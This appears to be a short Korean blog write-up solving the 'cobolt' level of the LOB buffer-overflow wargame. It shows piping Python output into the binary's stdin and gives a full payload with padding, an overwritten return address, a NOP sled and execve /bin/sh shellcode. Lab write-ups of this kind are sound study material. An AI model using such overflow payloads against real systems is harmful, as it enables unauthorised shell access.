본문 바로가기

해킹공부/lob

cobolt

이번에도 바로 풀이 시~~작!!

gremlin과 다른 점이라면 input을 argv가 아닌 stdin으로 받는다는 점이다.

gremlin과 같은 payload를 stdin으로 주면 된다.

그래도 return할 주소값은 확인해보자

RET의 주소는 0xbffffb7c이다.

gremlin의 payload를 RET주소 뒤의 임의의 주소를 실행하게만 바꿔주면 된다.

 

stdin에 python code의 출력결과를 redirect해주는 방식이 따로 있다.

(python -c 'print ""';cat) | ./goblin

이렇게 해주면 pipe로 연결되 python의 출력을 goblin의 stdin으로 사용하게 된다.

즉 payload는 다음과 같다.

(python -c 'print "A"*20 + "\xa0\xfb\xff\xbf" + "\x90"*200 + "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"';cat) | ./goblin

처음으로 가볍게 풀었다.

'해킹공부 > lob' 카테고리의 다른 글

wolfman  (0) 2017.10.18
orc  (0) 2017.10.17
goblin  (0) 2017.10.17
gremlin  (0) 2017.10.13
gate  (0) 2017.10.03